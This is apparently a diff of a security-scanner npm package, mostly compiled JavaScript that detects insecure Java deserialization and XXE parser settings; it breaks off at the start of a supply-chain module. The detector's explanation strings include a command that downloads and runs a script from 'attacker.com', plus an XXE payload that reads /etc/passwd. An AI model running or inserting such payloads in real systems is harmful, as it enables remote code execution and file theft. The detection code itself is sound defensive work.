  368. package/dist/src/lib/analyzers/typescript/security-checks/ai-generated-code.js +242 -0
  369. package/dist/src/lib/analyzers/typescript/security-checks/ai-generated-code.js.map +1 -0
  370. package/dist/src/lib/analyzers/typescript/security-checks/authentication.d.ts +28 -0
  371. package/dist/src/lib/analyzers/typescript/security-checks/authentication.d.ts.map +1 -0
  372. package/dist/src/lib/analyzers/typescript/security-checks/authentication.js +357 -0
  373. package/dist/src/lib/analyzers/typescript/security-checks/authentication.js.map +1 -0
  374. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.d.ts +26 -0
  375. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.d.ts.map +1 -0
  376. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.js +380 -0
  377. package/dist/src/lib/analyzers/typescript/security-checks/code-injection.js.map +1 -0
  378. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.d.ts +23 -0
  379. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.d.ts.map +1 -0
  380. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.js +109 -0
  381. package/dist/src/lib/analyzers/typescript/security-checks/code-quality.js.map +1 -0
  382. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.d.ts +21 -0
  383. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.d.ts.map +1 -0
  384. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.js +153 -0
  385. package/dist/src/lib/analyzers/typescript/security-checks/credentials-crypto.js.map +1 -0
  386. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.d.ts +23 -0
  387. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.d.ts.map +1 -0
  388. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.js +146 -0
  389. package/dist/src/lib/analyzers/typescript/security-checks/enhanced-supply-chain.js.map +1 -0
  390. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.d.ts +23 -0
  391. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.d.ts.map +1 -0
  392. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.js +187 -0
  393. package/dist/src/lib/analyzers/typescript/security-checks/exception-handling.js.map +1 -0
  394. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.d.ts +19 -0
  395. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.d.ts.map +1 -0
  396. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.js +97 -0
  397. package/dist/src/lib/analyzers/typescript/security-checks/information-disclosure.js.map +1 -0
  398. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.d.ts +29 -0
  399. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.d.ts.map +1 -0
  400. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.js +319 -0
  401. package/dist/src/lib/analyzers/typescript/security-checks/injection-attacks.js.map +1 -0
  402. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.d.ts +21 -0
  403. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.d.ts.map +1 -0
  404. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.js +121 -0
  405. package/dist/src/lib/analyzers/typescript/security-checks/logging-failures.js.map +1 -0
  406. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.d.ts +27 -0
  407. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.d.ts.map +1 -0
  408. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.js +213 -0
  409. package/dist/src/lib/analyzers/typescript/security-checks/security-misconfiguration.js.map +1 -0
  410. package/dist/src/lib/analyzers/typescript/security-checks/type-security.d.ts +19 -0
  411. package/dist/src/lib/analyzers/typescript/security-checks/type-security.d.ts.map +1 -0
  412. package/dist/src/lib/analyzers/typescript/security-checks/type-security.js +59 -0
  413. package/dist/src/lib/analyzers/typescript/security-checks/type-security.js.map +1 -0
  414. package/dist/src/lib/analyzers/typescript/type-checker.d.ts +17 -0
  415. package/dist/src/lib/analyzers/typescript/type-checker.d.ts.map +1 -0
  416. package/dist/src/lib/analyzers/typescript/type-checker.js +515 -0
  417. package/dist/src/lib/analyzers/typescript/type-checker.js.map +1 -0
  418. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.d.ts +58 -0
  419. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.d.ts.map +1 -0
  420. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.js +71 -0
  421. package/dist/src/lib/analyzers/typescript/utils/createVulnerability.js.map +1 -0
  422. package/dist/src/lib/analyzers/typescript-analyzer.d.ts +116 -0
  423. package/dist/src/lib/analyzers/typescript-analyzer.d.ts.map +1 -0
  424. package/dist/src/lib/analyzers/typescript-analyzer.js +1660 -0
  425. package/dist/src/lib/analyzers/typescript-analyzer.js.map +1 -0
  426. package/dist/src/lib/security/compliance-mapping.d.ts +29 -0
  427. package/dist/src/lib/security/compliance-mapping.d.ts.map +1 -0
  428. package/dist/src/lib/security/compliance-mapping.js +1342 -0
  429. package/dist/src/lib/security/compliance-mapping.js.map +1 -0
  430. package/dist/src/lib/security/severity-scoring.d.ts +47 -0
  431. package/dist/src/lib/security/severity-scoring.d.ts.map +1 -0
  432. package/dist/src/lib/security/severity-scoring.js +965 -0
  433. package/dist/src/lib/security/severity-scoring.js.map +1 -0
  434. package/dist/src/lib/standards/references.d.ts +16 -0
  435. package/dist/src/lib/standards/references.d.ts.map +1 -0
  436. package/dist/src/lib/standards/references.js +1161 -0
  437. package/dist/src/lib/standards/references.js.map +1 -0
  438. package/dist/src/lib/types/index.d.ts +167 -0
  439. package/dist/src/lib/types/index.d.ts.map +1 -0
  440. package/dist/src/lib/types/index.js +3 -0
  441. package/dist/src/lib/types/index.js.map +1 -0
  442. package/dist/src/lib/utils/code-cleaner.d.ts +59 -0
  443. package/dist/src/lib/utils/code-cleaner.d.ts.map +1 -0
  444. package/dist/src/lib/utils/code-cleaner.js +283 -0
  445. package/dist/src/lib/utils/code-cleaner.js.map +1 -0
  446. package/package.json +51 -0
  447. package/src/commands/auth.ts +308 -0
  448. package/src/commands/config.ts +226 -0
  449. package/src/commands/init.ts +202 -0
  450. package/src/commands/scan.ts +238 -0
  451. package/src/config/config-loader.ts +175 -0
  452. package/src/reporters/cli-reporter.ts +282 -0
  453. package/src/scanner/local-scanner.ts +250 -0
  454. package/tsconfig.json +24 -0
  455. package/tsconfig.tsbuildinfo +1 -0
package/dist/src/lib/analyzers/java/security-checks/deserialization-xxe.js ADDED
@@ -0,0 +1,163 @@
1
+ "use strict";
2
+ /**
3
+ * Java Deserialization and XXE Detection Module
4
+ *
5
+ * OWASP A08:2021 - Software and Data Integrity Failures
6
+ *
7
+ * This module detects vulnerabilities related to unsafe data processing:
8
+ * - Insecure Deserialization (CRITICAL)
9
+ * - XML External Entity (XXE) attacks (HIGH)
10
+ *
11
+ * Both vulnerabilities can lead to Remote Code Execution and severe data breaches.
12
+ */
13
+ Object.defineProperty(exports, "__esModule", { value: true });
14
+ exports.checkDeserializationAndXXE = checkDeserializationAndXXE;
15
+ const createVulnerability_1 = require("../utils/createVulnerability");
16
+ /**
17
+ * Checks for deserialization and XXE vulnerabilities in Java code
18
+ *
19
+ * @param lines - Array of code lines to analyze
20
+ * @returns Array of detected security vulnerabilities
21
+ */
22
+ function checkDeserializationAndXXE(lines) {
23
+ const vulnerabilities = [];
24
+ let inMultiLineComment = false;
25
+ lines.forEach((line, index) => {
26
+ const lineNumber = index + 1;
27
+ const trimmed = line.trim();
28
+ // Track multi-line comment blocks (/* ... */)
29
+ if (trimmed.includes('/*')) {
30
+ inMultiLineComment = true;
31
+ }
32
+ if (trimmed.includes('*/')) {
33
+ inMultiLineComment = false;
34
+ return;
35
+ }
36
+ // Skip comments and empty lines
37
+ if (!trimmed || inMultiLineComment || trimmed.startsWith('//') || trimmed.startsWith('*'))
38
+ return;
39
+ // 5. Insecure deserialization - CRITICAL (Enhanced for Phase B)
40
+ // Detects:
41
+ // - ObjectInputStream without filtering
42
+ // - XStream without security framework
43
+ // - Jackson enableDefaultTyping
44
+ // - @JsonTypeInfo without restrictions
45
+ // - SnakeYAML unsafe constructor
46
+ // - Spring remoting
47
+ // Pattern 1: ObjectInputStream without validation
48
+ const hasObjectInputStream = trimmed.match(/ObjectInputStream\s*\(/) &&
49
+ !trimmed.includes('ValidatingObjectInputStream') &&
50
+ !trimmed.includes('ObjectInputFilter');
51
+ // Pattern 2: XStream without security framework
52
+ const hasXStreamVuln = trimmed.match(/new\s+XStream\s*\(/) ||
53
+ (trimmed.match(/XStream/) && trimmed.match(/fromXML\s*\(/));
54
+ // Pattern 3: Jackson enableDefaultTyping (very dangerous)
55
+ const hasJacksonVuln = trimmed.match(/enableDefaultTyping\s*\(/);
56
+ // Pattern 4: @JsonTypeInfo annotation (potential vuln if unrestricted)
57
+ const hasJsonTypeInfo = trimmed.match(/@JsonTypeInfo/) &&
58
+ (trimmed.includes('Id.CLASS') || trimmed.includes('Id.MINIMAL_CLASS'));
59
+ // Pattern 5: SnakeYAML unsafe constructor
60
+ const hasYAMLVuln = trimmed.match(/new\s+Yaml\s*\(/) &&
61
+ (trimmed.match(/new\s+Constructor\s*\(/) || !trimmed.includes('SafeConstructor'));
62
+ // Pattern 6: Spring HttpInvokerServiceExporter (uses Java serialization)
63
+ const hasSpringRemoting = trimmed.match(/HttpInvokerServiceExporter/) ||
64
+ trimmed.match(/RmiServiceExporter/);
65
+ if (hasObjectInputStream || hasXStreamVuln || hasJacksonVuln || hasJsonTypeInfo || hasYAMLVuln || hasSpringRemoting) {
66
+ let message = 'Insecure Deserialization vulnerability detected';
67
+ let recommendation = 'Use ValidatingObjectInputStream with class whitelist, or avoid deserializing untrusted data entirely';
68
+ if (hasXStreamVuln) {
69
+ message = 'Insecure Deserialization vulnerability detected in XStream';
70
+ recommendation = 'Use XStream.setupDefaultSecurity() or implement custom security framework with whitelist';
71
+ }
72
+ else if (hasJacksonVuln) {
73
+ message = 'Insecure Deserialization vulnerability detected in Jackson - enableDefaultTyping is extremely dangerous';
74
+ recommendation = 'Remove enableDefaultTyping(). Use explicit @JsonSubTypes or PolymorphicTypeValidator with whitelist';
75
+ }
76
+ else if (hasJsonTypeInfo) {
77
+ message = 'Potential Deserialization vulnerability - @JsonTypeInfo allows type specification';
78
+ recommendation = 'Use @JsonSubTypes to restrict allowed types or configure PolymorphicTypeValidator';
79
+ }
80
+ else if (hasYAMLVuln) {
81
+ message = 'Insecure Deserialization vulnerability detected in SnakeYAML';
82
+ recommendation = 'Use SafeConstructor instead of Constructor to prevent arbitrary object instantiation';
83
+ }
84
+ else if (hasSpringRemoting) {
85
+ message = 'Insecure Deserialization vulnerability in Spring Remoting';
86
+ recommendation = 'Spring remoting uses Java serialization. Switch to REST/gRPC or implement custom serialization with validation';
87
+ }
88
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('deserialization', message, recommendation, lineNumber, 'Java deserialization can instantiate arbitrary classes and execute their methods during object reconstruction. Attackers can craft malicious serialized objects that exploit gadget chains in the classpath (e.g., Commons Collections, Spring, Groovy) to achieve arbitrary code execution with full application privileges. This applies to ObjectInputStream, XStream, Jackson with default typing, and SnakeYAML.', 'Attacker sends crafted serialized object exploiting Commons Collections InvokerTransformer chain to execute: Runtime.getRuntime().exec("wget attacker.com/backdoor.sh | sh")', [
89
+ 'Remote Code Execution (RCE)',
90
+ 'Complete server compromise',
91
+ 'Data exfiltration',
92
+ 'Denial of Service',
93
+ 'Installation of backdoors',
94
+ 'Lateral movement'
95
+ ], 'ObjectInputStream ois = new ObjectInputStream(inputStream);\nObject obj = ois.readObject(); // Vulnerable to gadget chains\n// OR\nObjectMapper mapper = new ObjectMapper();\nmapper.enableDefaultTyping(); // Allows arbitrary class instantiation', 'import org.apache.commons.io.serialization.ValidatingObjectInputStream;\nValidatingObjectInputStream vois = new ValidatingObjectInputStream(inputStream);\nvois.accept(TrustedClass.class);\nObject obj = vois.readObject();\n// OR for Jackson:\nObjectMapper mapper = new ObjectMapper();\n// Use explicit subtypes instead of enableDefaultTyping', 'Use ValidatingObjectInputStream to whitelist allowed classes, or preferably switch to safer formats like JSON with Jackson/Gson (without enableDefaultTyping). For XStream, use setupDefaultSecurity(). For SnakeYAML, use SafeConstructor. Never deserialize untrusted data without strict class filtering'));
96
+ }
97
+ // 6. XML External Entity (XXE) - HIGH (Enhanced for Phase B)
98
+ // Detects:
99
+ // - DocumentBuilderFactory without secure features
100
+ // - SAXParserFactory without secure features
101
+ // - XMLInputFactory without secure properties
102
+ // - JAXB Unmarshaller without secure parsing
103
+ // - Third-party XML libraries (dom4j, jdom)
104
+ // - Spring XML bean definitions
105
+ // Check if this line or previous lines have secure configuration
106
+ const prevLines = lines.slice(Math.max(0, index - 10), index);
107
+ const hasSecureFeatures = prevLines.some(l => l.includes('setFeature') && (l.includes('disallow-doctype-decl') ||
108
+ l.includes('external-general-entities') ||
109
+ l.includes('external-parameter-entities') ||
110
+ l.includes('FEATURE_SECURE_PROCESSING')));
111
+ const hasSecureProperties = prevLines.some(l => l.includes('setProperty') && (l.includes('IS_SUPPORTING_EXTERNAL_ENTITIES') ||
112
+ l.includes('SUPPORT_DTD')));
113
+ // Pattern 1: DocumentBuilderFactory without secure features
114
+ const hasDocBuilderVuln = trimmed.match(/DocumentBuilderFactory\.newInstance\s*\(\)/) &&
115
+ !hasSecureFeatures;
116
+ // Pattern 2: SAXParserFactory without secure features
117
+ const hasSAXParserVuln = trimmed.match(/SAXParserFactory\.newInstance\s*\(\)/) &&
118
+ !hasSecureFeatures;
119
+ // Pattern 3: XMLInputFactory - check if setProperty is called in nearby lines
120
+ const hasXMLInputFactory = trimmed.match(/XMLInputFactory\.newFactory\s*\(\)/) ||
121
+ trimmed.match(/XMLInputFactory\.newInstance\s*\(\)/);
122
+ const hasXMLInputFactoryVuln = hasXMLInputFactory && !hasSecureProperties;
123
+ // Pattern 4: JAXB Unmarshaller without secure parsing
124
+ const hasJAXBUnmarshallerVuln = trimmed.match(/\.unmarshal\s*\(/) &&
125
+ (trimmed.match(/Unmarshaller/) || prevLines.some(l => l.match(/Unmarshaller/)));
126
+ // Pattern 5: Third-party XML libraries
127
+ const hasThirdPartyXML = trimmed.match(/SAXReader\s*\(/) ||
128
+ trimmed.match(/\.read\s*\(/) && prevLines.some(l => l.match(/SAXReader|dom4j/));
129
+ // Pattern 6: Spring XML bean definitions
130
+ const hasSpringXMLBeans = trimmed.match(/XmlBeanDefinitionReader/) ||
131
+ trimmed.match(/loadBeanDefinitions.*InputSource/);
132
+ // Pattern 7: General XML parsing with .parse() method
133
+ const hasGenericParse = trimmed.match(/\.parse\s*\(/) &&
134
+ (trimmed.match(/DocumentBuilder/) || prevLines.some(l => l.match(/DocumentBuilder/))) &&
135
+ !hasSecureFeatures;
136
+ if (hasDocBuilderVuln || hasSAXParserVuln || hasXMLInputFactoryVuln || hasJAXBUnmarshallerVuln ||
137
+ hasThirdPartyXML || hasSpringXMLBeans || hasGenericParse) {
138
+ let message = 'XML External Entity (XXE) vulnerability detected';
139
+ let recommendation = 'Disable external entity processing: factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)';
140
+ if (hasXMLInputFactoryVuln) {
141
+ message = 'XXE vulnerability in XMLInputFactory';
142
+ recommendation = 'Set IS_SUPPORTING_EXTERNAL_ENTITIES=false and SUPPORT_DTD=false on XMLInputFactory';
143
+ }
144
+ else if (hasJAXBUnmarshallerVuln) {
145
+ message = 'XXE vulnerability in JAXB Unmarshaller';
146
+ recommendation = 'Configure underlying XMLInputFactory or DocumentBuilderFactory with secure features before creating Unmarshaller';
147
+ }
148
+ else if (hasThirdPartyXML) {
149
+ message = 'XXE vulnerability in third-party XML library (dom4j/jdom)';
150
+ recommendation = 'Configure parser with setFeature to disable DTD and external entities';
151
+ }
152
+ vulnerabilities.push((0, createVulnerability_1.createJavaSecurityVulnerability)('xxe', message, recommendation, lineNumber, 'XML parsers by default process external entity references and DTD declarations in XML documents. Attackers can exploit this to read arbitrary files from the server filesystem, perform Server-Side Request Forgery (SSRF) attacks to internal systems, cause Denial of Service through entity expansion (billion laughs attack), or exfiltrate data through out-of-band channels.', 'XML with <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> reads /etc/passwd file and includes content in parser output or error messages', [
153
+ 'Arbitrary file disclosure (/etc/passwd, application.properties, AWS credentials)',
154
+ 'Server-Side Request Forgery (SSRF) to internal services (cloud metadata, databases)',
155
+ 'Denial of Service (billion laughs entity expansion attack)',
156
+ 'Port scanning internal network',
157
+ 'Data exfiltration via out-of-band HTTP/DNS channels'
158
+ ], 'DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();\nDocumentBuilder builder = factory.newDocumentBuilder();\nDocument doc = builder.parse(xmlInput); // Vulnerable - DTD enabled', 'DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();\nfactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\nfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);\nfactory.setFeature("http://xml.org/sax/features/external-general-entities", false);\nfactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);\nDocumentBuilder builder = factory.newDocumentBuilder();\nDocument doc = builder.parse(xmlInput);', 'Disable DOCTYPE declarations and external entity processing by setting secure features on the XML parser factory. For XMLInputFactory, set IS_SUPPORTING_EXTERNAL_ENTITIES=false. For JAXB, configure the underlying parser factory. Always parse untrusted XML with all entity processing disabled'));
159
+ }
160
+ });
161
+ return vulnerabilities;
162
+ }
163
+ //# sourceMappingURL=deserialization-xxe.js.map
package/dist/src/lib/analyzers/java/security-checks/deserialization-xxe.js.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"deserialization-xxe.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/deserialization-xxe.ts"],"names":[],"mappings":"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"}
package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.d.ts ADDED
@@ -0,0 +1,24 @@
1
+ /**
2
+ * Java Enhanced Supply Chain Security Checks
3
+ * OWASP A03:2025 - Software and Supply Chain Security
4
+ *
5
+ * Detects supply chain vulnerabilities specific to Java ecosystem.
6
+ * Updated for OWASP 2025 with enhanced Maven/Gradle security (Phase 7B Day 7).
7
+ */
8
+ import { SecurityVulnerability } from '../../types';
9
+ /**
10
+ * Checks for enhanced supply chain security vulnerabilities in Java code
11
+ *
12
+ * Covers:
13
+ * - Check #1: Dynamic class loading with user input (CRITICAL)
14
+ * - Check #2: Insecure Maven repositories (HIGH)
15
+ * - Check #3: Package typosquatting patterns (CRITICAL)
16
+ * - Check #4: Unsigned JAR usage (HIGH) - NEW OWASP 2025
17
+ * - Check #5: Dependency confusion (HIGH) - NEW OWASP 2025
18
+ * - Check #6: Runtime bytecode loading (CRITICAL) - NEW OWASP 2025
19
+ *
20
+ * @param lines - Array of code lines
21
+ * @returns Array of security vulnerabilities found
22
+ */
23
+ export declare function checkEnhancedSupplyChain(lines: string[]): SecurityVulnerability[];
24
+ //# sourceMappingURL=enhanced-supply-chain.d.ts.map
package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.d.ts.map ADDED
@@ -0,0 +1 @@
1
+ {"version":3,"file":"enhanced-supply-chain.d.ts","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/java/security-checks/enhanced-supply-chain.ts"],"names":[],"mappings":"AAAA;;;;;;GAMG;AAEH,OAAO,EAAE,qBAAqB,EAAE,MAAM,aAAa,CAAC;AAGpD;;;;;;;;;;;;;GAaG;AACH,wBAAgB,wBAAwB,CACtC,KAAK,EAAE,MAAM,EAAE,GACd,qBAAqB,EAAE,CA2PzB"}
package/dist/src/lib/analyzers/java/security-checks/enhanced-supply-chain.js ADDED
@@ -0,0 +1,178 @@
1
+ "use strict";
2
+ /**
3
+ * Java Enhanced Supply Chain Security Checks
4
+ * OWASP A03:2025 - Software and Supply Chain Security
5
+ *
6
+ * Detects supply chain vulnerabilities specific to Java ecosystem.
7
